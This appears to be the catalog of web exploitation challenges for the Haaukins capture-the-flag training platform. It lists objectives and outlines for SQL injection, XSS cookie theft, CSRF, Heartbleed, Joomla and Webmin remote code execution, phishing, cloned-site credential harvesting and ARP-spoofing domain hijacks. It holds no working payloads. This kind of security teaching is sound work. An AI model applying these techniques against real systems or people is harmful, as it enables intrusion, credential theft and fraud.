Web Exploitation
Web Exploitation challenges for Haaukins Platform.
- Web Exploitation
Web Exploitation
This category includes all the challenges that provide a vulnerable website, from the ones that contains a bug to the ones that run over an old version of a framework. All the challenges in this category show up in a kind of challenge in which the user need to exploit a bug to gain some kind of higher level privilege.
Difficulty Levels
The levels of difficulty scale is based on the number of steps required in order to solve the Training Challenge
- Very Easy: It requires just one step in order to get the flag
- __Easy:__ It requires one-two steps, it is based on the challenge category
- Medium: It requires two-three steps, it is based on the challenge category
- Hard: It requires three-four steps based on the challenge category
- __Very Hard:__ It requires several steps in order to get the flag
SQL Injections
SQL Injection
Points: 50 Difficulty: Medium
Learning Objectives:
- Understand how an SQL attack is performed
- SQL language and its syntax
Description: In this challenge, the HAAUKINS user is expected to utilise knowledge about web service communication. When accessing and logging into the website in challenge “1.3: Web server login”, it should be noticed that the presented home screen includes a comments field. When posting a comment this is shown on the website page, which illustrates that database communication is active. After this realisation the user is expected to form an abusive SQL query and exploit the comments field to access passwords from the database users table.
Prerequisite:
- Understand the fundamentals of database communication (SQL)
SQL Users
Points: 26 Difficulty: Medium
Learning Objectives:
- Learn a bit of pen testing workflow(Enumeration).
- Learn the importance of sanitizing inputs during development.
- Learn the basic idea of SQL injections Description: Use SQL injections to bypass the owner of the page’s password
Prerequisite:
- Understand the fundamentals of database communication (SQL)
SQL Easy
Points: 18 Difficulty: Medium
Learning Objectives:
- Understand how an SQL attack is performed
- SQL language and its syntax
Description: In this exercise the user will need to find the place where the website is vulnerable to SQL injections and use this in order to change the credentials of the first user in the users table and use these to login and find the flag.
Prerequisite:
- Understand the fundamentals of database communication (SQL)
Micro CMS XXS , URL and robots
Points: 10-14-18 Difficulty: Very easy
Learning Objectives:
- Lean how much is it important to sanitize the data submitted through a form
- Manage and Modify the URL
Description: I have implemented a basic Content Management System (CMS) in which the user is faced with an interface in which they can create and edit web pages. The main goal of this challenge is to let the user understand how an XSS works and also how is possible to retrieve data managing the URL. On this challenge the user has to find three flags (the order doesn’t matter):
Prerequisite:
- Know how an Cross-Site Scripting (XSS) works
Heartbleed
Points: 16 Difficulty: Easy
Learning Objectives:
- Achieve confidence using the Metasploit framework
- Understand that also encrypted web traffic (HTTPS) can be exploited
Description: In this challenge, the HAAUKINS user is expected to complete an attack abusing the famous Heartbleed Bug, that is a serious vulnerability in the popular OpenSSL cryptographic software library. This bug allows an attacker to access information otherwise protected by SSL/TLS encryption. The user is expected to gather information about conducting a Heartbleed attack from Google, and subsequently configure a Metasploit session to complete the exploit. The target host should be determined through an active network scan.
Prerequisite:
- Fundamentals in Linux terminal
- Knowing what Metasploit is and its capabilities
Exposed Logging Login Blogging
Points: 20 Difficulty: Easy
Learning Objectives:
- Learning about the role of the robots.txt file on the web.
- Learning about the danger of exposing sensitive data, such as logs, on a web site.
- Learning how to crack MD5 hashes for other challenges.
Description: A logging file with weakly encrypted sensitive data is left exposed on a website, only protected by obscurity. Its location is revealed by the robots.txt file. Ultimately, the challenger can get a password by piecing together information in the logging file. Logging in and posting on the blog will reveal the flag.
Prerequisite:
- Knowing that ‘/’ in URLs can be used to access different pages/resources on the same domain.
- Ability to understand the basic relationship between a hash value and an original input.
Cross-Site Request Forgery
Points: 36 Difficulty: Medium
Learning Objectives:
- Gain a basic understanding of web APIs
Description: In this challenge the user is expected to utilise knowledge about web service communication. After registering on the website the user should figure out that the people in the chat is clicking on all links send. After realising this the user should use knowledge about web APIs to create a link that will get the other users to send money in order to buy the flag.
Phishing
Convince visitation of URL
Points: 48 Difficulty: Medium
Learning Objectives:
- Introduction to mail servers and protocols as ‘Simple Mail Transfer Protocol’, SMTP.
- Mail clients and how to forward emails through a STMP server in a terminal.
- Capturing POST requests
Description: Social Engineering including spear phishing emails is very popular in the hacking community, because it’s a lot easier to hack a person than a computer. In this challenge the HAAUKINS user shall try to trick a person into visiting a website of his choice. In order to do that the user needs to know who to target; the first goal is to do some recon on the network and websites. The next step is to send the target an email with an URL. Haaukins is a closed environment and the user will need to use a mail server running on the network. The participants can see various flags (through traffic analysis) being exposed as they conduct phishing against an email listed on the web server.
Prerequisite:
- It’s necessary to know how an SMTP server works and how to find services on a network like web server and SMTP server (challenge 1.2).
Impersonate colleague
Points: 58 Difficulty: Medium
Learning Objectives:
- Learn how to send a phishing email
Description: This is phishing challenge in which the user shall try to trick a person into visiting a website of his choice. In order to do that the user has to find the destination email by looking the network and the website. The user should let the destination email understand that the email is from the same domain in order to get the flag.
Prerequisite:
Abuse Credentials
Points: 33 Difficulty: Easy
Learning Objectives:
- Introduction to mail servers and protocols as Simple Mail Transfer Protocol
- Setup a simple web server with a custom HTML script
Description: If a you can get a person to visit your website, maybe you can get him to input credentials and hand it over to you? In this challenge the user will continue working on phishing, but he will learn that it’s a lot more than just sending some emails to important people. He will need to trick them into passing confidential information without suspicion. He can do this by cloning a website the victim is trusting and trick him visit it.
Prerequisite:
Hijack Domain
Points: 70 Difficulty: Very hard
Learning Objectives:
- Learn how spoofing works
- ARP Protocol
Description: This is a phishing challenge in which the user has to hijack the challenge domain. The user should redirect the traffic of the legitimate website to the kali machine in order to get the flag.
Prerequisite:
Cross-Site Scripting
Points: 55 Difficulty: Medium
Learning Objectives:
- Learn how to gain unauthorized access on a website
Description: The challenge consists of two machines a server and a client. The server hosts a website with a comment section which is vulnerable to injecting JavaScript. The users has to use the section in order to steal the session cookie from the client, which visits the site from time to time. When they have stolen the cookie, then they can use it to gain authorized access and find the flag.
Prerequisite:
- Micro CMS
- Know how the cookies work
Unauthenticated Access
Points: 20 Difficulty: Hard
Learning Objectives:
- Understanding of how HTTP headers works and how to manipulate them in order to get remote code execution access.
Description: The challenge provides to the user a website in which is installed an old version of Joomla. This CMS suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. It means any file on server can be accessible by sending commands, so in order to get flag from the server, users should be able to search for it and then read it.
Prerequisite:
- Knowledge about HTTP requests and headers
- Familiarity to Metasploit modules
Remote Access
Points: 65 Difficulty: Very hard
Learning Objectives:
- Know how to use cURL
Description: The challenge provides to the user a website in which is installed an old version of Webmin. Webmin is a web-based interface for system administration for Unix. Using any modern web browser, it is possible to setup user accounts, Apache, DNS, file sharing and much more. This web-based interface suffers from an unauthenticated remote code execution that affect the version 1.920. The main goal of the challenge is to get the flag contained into a txt file making request through either command line i.e. curl or some Kali Linux tools
Prerequisite:
- Analyse Wireshark traffic
- Know how to make an HTTP request from command line
Bust-N-Crack
Points: 12-19 Difficulty: Medium
Learning Objectives:
- Learn that it is important to configure a web server correct and clean up old files
- Learn how to crack a private ssh key
Description In this exercise contains a host running SSH and and HTTP, the user will then need to use dirbuster to find the directories that is exposed by the web server. The user should then find a directory containing the first flag and a ssh-key. The ssh-key is protected by a password which can be cracked by using john the ripper. After finding the password the key can be used to login to the server.
Prerequisite:
- Knowledge of john the ripper/password cracking
- Knowledge of dirbuster
JWT
Points: 30 Difficulty: Medium
Learning Objectives:
- Learn how to exploit JWT
Description This challenge is based on the JSON Web Token. The user just need to log in to access the main page, any name can be used except admin. Once logged in, from the network console of the browser it is possible to notice a Cookie called jwt. That cookie allows the user to change the session, so in order to solve the challenge a request with a different cookie value has to be sent.
Prerequisite:
- Knowledge of JSON Web Token
- Know how to crack an hashed password with Kali Linux
- Knowledge of Curl, Burpsuite or any other software which can forge http requests.
Deeplink
Points: 48 Difficulty: Medium
Learning Objectives:
- Learn how to exploit deeplinks.
Description: This challenge is based on android intent that allows other apps and the browser to link to specifik sites in the app. The intent can be exploited to load something else in the app.
So with a website it is possible to call other functions inside the app.
Prerequisite:
- reverse an APK
- create a simple website